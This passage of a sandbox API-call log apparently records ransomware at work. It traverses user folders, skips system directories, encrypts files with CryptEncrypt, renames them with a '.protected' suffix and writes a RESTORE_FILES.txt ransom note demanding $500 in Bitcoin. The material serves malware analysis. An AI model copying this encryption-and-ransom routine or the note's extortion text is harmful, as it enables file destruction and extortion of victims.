halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js.protected")) returned 1 [0089.487] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.487] lstrcmpiW (lpString1="glob.settings.js", lpString2="Windows") returned -1 [0089.487] lstrcmpiW (lpString1="glob.settings.js", lpString2="Program Files") returned -1 [0089.487] lstrcmpiW (lpString1="glob.settings.js", lpString2="Program Files (x86)") 
returned -1 [0089.487] lstrcmpiW (lpString1="glob.settings.js", lpString2="$Recycle.bin") returned 1 [0089.487] lstrcmpiW (lpString1="glob.settings.js", lpString2="System Volume Information") returned -1 [0089.487] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js") returned 97 [0089.487] StrStrIW (lpFirst="glob.settings.js", lpSrch=".protected") returned 0x0 [0089.487] lstrcmpW (lpString1="glob.settings.js", lpString2="RESTORE_FILES.txt") returned -1 [0089.487] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.487] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.487] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js") returned 97 [0089.488] StrStrW (lpFirst="glob.settings.js", lpSrch=".txt") returned 0x0 [0089.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js") returned 97 [0089.488] StrStrW (lpFirst="glob.settings.js", lpSrch=".rar") returned 0x0 [0089.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js") returned 97 [0089.488] StrStrW 
(lpFirst="glob.settings.js", lpSrch=".zip") returned 0x0 [0089.488] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0xa, lpOverlapped=0x0) returned 1 [0089.489] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffff6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.489] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0xa, lpOverlapped=0x0) returned 1 [0089.489] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.489] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.489] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.489] CloseHandle (hObject=0x154) returned 1 [0089.490] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.protected") returned 107 [0089.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\glob.settings.js.protected" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js.protected")) returned 1 [0089.490] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0089.490] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0089.491] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\RESTORE_FILES.txt") returned 98 [0089.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\JavaScripts\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.501] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.501] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0089.502] lstrlenA (lpString="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") returned 684 [0089.502] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0089.502] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.502] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.502] CloseHandle (hObject=0x150) returned 1 [0089.502] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.502] lstrcmpiW (lpString1="Security", lpString2="Windows") returned -1 [0089.502] lstrcmpiW (lpString1="Security", lpString2="Program Files") returned 1 [0089.502] lstrcmpiW (lpString1="Security", lpString2="Program Files (x86)") returned 1 [0089.502] lstrcmpiW (lpString1="Security", lpString2="$Recycle.bin") returned 1 [0089.502] lstrcmpiW (lpString1="Security", lpString2="System Volume Information") returned -1 [0089.502] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security") returned 77 [0089.502] lstrcmpW (lpString1="Security", lpString2=".") returned 1 [0089.502] lstrcmpW (lpString1="Security", lpString2="..") returned 1 [0089.502] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*") returned 79 [0089.502] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0089.503] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.503] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.503] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.503] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.503] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.503] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\.") returned 79 [0089.503] lstrcmpW (lpString1=".", 
lpString2=".") returned 0 [0089.503] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.503] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.503] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.503] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.503] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.503] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.503] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\..") returned 80 [0089.503] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.503] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.503] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.503] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="Windows") returned -1 [0089.503] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="Program Files") returned -1 [0089.503] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="Program Files (x86)") returned -1 [0089.503] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="$Recycle.bin") returned 1 [0089.503] lstrcmpiW (lpString1="addressbook.acrodata", lpString2="System Volume Information") returned -1 [0089.503] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata") returned 98 [0089.503] StrStrIW (lpFirst="addressbook.acrodata", lpSrch=".protected") returned 0x0 [0089.503] lstrcmpW (lpString1="addressbook.acrodata", lpString2="RESTORE_FILES.txt") returned -1 [0089.503] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0089.503] 
CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0089.503] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0089.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata") returned 98 [0089.505] StrStrW (lpFirst="addressbook.acrodata", lpSrch=".txt") returned 0x0 [0089.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata") returned 98 [0089.505] StrStrW (lpFirst="addressbook.acrodata", lpSrch=".rar") returned 0x0 [0089.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata") returned 98 [0089.505] StrStrW (lpFirst="addressbook.acrodata", lpSrch=".zip") returned 0x0 [0089.505] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x1517, lpOverlapped=0x0) returned 1 [0089.525] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffeae9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.525] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x1517, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x1517, lpOverlapped=0x0) returned 1 [0089.525] SetFilePointerEx (in: 
hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.525] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0089.525] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0089.525] CloseHandle (hObject=0x154) returned 1 [0089.526] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.protected") returned 108 [0089.526] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata.protected")) returned 1 [0089.526] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0089.526] lstrcmpiW (lpString1="CRLCache", lpString2="Windows") returned -1 [0089.526] lstrcmpiW (lpString1="CRLCache", lpString2="Program Files") returned -1 [0089.526] lstrcmpiW (lpString1="CRLCache", lpString2="Program Files (x86)") returned -1 [0089.527] lstrcmpiW (lpString1="CRLCache", lpString2="$Recycle.bin") returned 1 [0089.527] lstrcmpiW (lpString1="CRLCache", lpString2="System Volume Information") returned -1 [0089.527] wnsprintfW (in: 
pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache") returned 86 [0089.527] lstrcmpW (lpString1="CRLCache", lpString2=".") returned 1 [0089.527] lstrcmpW (lpString1="CRLCache", lpString2="..") returned 1 [0089.527] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*") returned 88 [0089.527] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0089.527] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.527] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.527] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.527] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.527] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.527] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\.") returned 88 [0089.527] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.527] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0089.527] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.527] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.527] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.527] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.527] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.527] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\..") returned 89 [0089.527] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.527] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.527] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0089.527] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="Windows") returned -1 [0089.527] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="Program Files") returned -1 [0089.527] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="Program Files (x86)") returned -1 [0089.527] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="$Recycle.bin") returned 1 [0089.527] lstrcmpiW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="System Volume Information") returned -1 [0089.527] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl") returned 131 [0089.527] StrStrIW (lpFirst="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpSrch=".protected") returned 0x0 [0089.527] lstrcmpW (lpString1="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpString2="RESTORE_FILES.txt") returned -1 [0089.527] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0089.527] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0089.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0089.528] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl") returned 131 [0089.528] StrStrW (lpFirst="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpSrch=".txt") returned 0x0 [0089.528] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl") returned 131 [0089.528] StrStrW (lpFirst="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpSrch=".rar") returned 0x0 [0089.528] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl") returned 131 [0089.528] StrStrW (lpFirst="48B76449F3D5FEFA1133AA805E420F0FCA643651.crl", lpSrch=".zip") returned 0x0 [0089.528] ReadFile (in: hFile=0x158, lpBuffer=0x513c88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesRead=0x295e2d4*=0x3a5, lpOverlapped=0x0) returned 1 [0089.554] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffc5b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.554] WriteFile (in: hFile=0x158, lpBuffer=0x513c88*, nNumberOfBytesToWrite=0x3a5, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x513c88*, lpNumberOfBytesWritten=0x295e2d4*=0x3a5, lpOverlapped=0x0) returned 1 [0089.555] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.555] WriteFile (in: 
hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0089.556] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0089.556] CloseHandle (hObject=0x158) returned 1 [0089.556] wnsprintfW (in: pszDest=0x513c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.protected") returned 141 [0089.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\48b76449f3d5fefa1133aa805e420f0fca643651.crl.protected")) returned 1 [0089.557] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0089.557] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="Windows") returned -1 [0089.557] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="Program Files") returned -1 [0089.557] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="Program Files (x86)") returned -1 [0089.557] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", 
lpString2="$Recycle.bin") returned 1 [0089.557] lstrcmpiW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="System Volume Information") returned -1 [0089.557] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl") returned 131 [0089.557] StrStrIW (lpFirst="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpSrch=".protected") returned 0x0 [0089.557] lstrcmpW (lpString1="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpString2="RESTORE_FILES.txt") returned -1 [0089.557] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0089.557] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0089.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0089.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl") returned 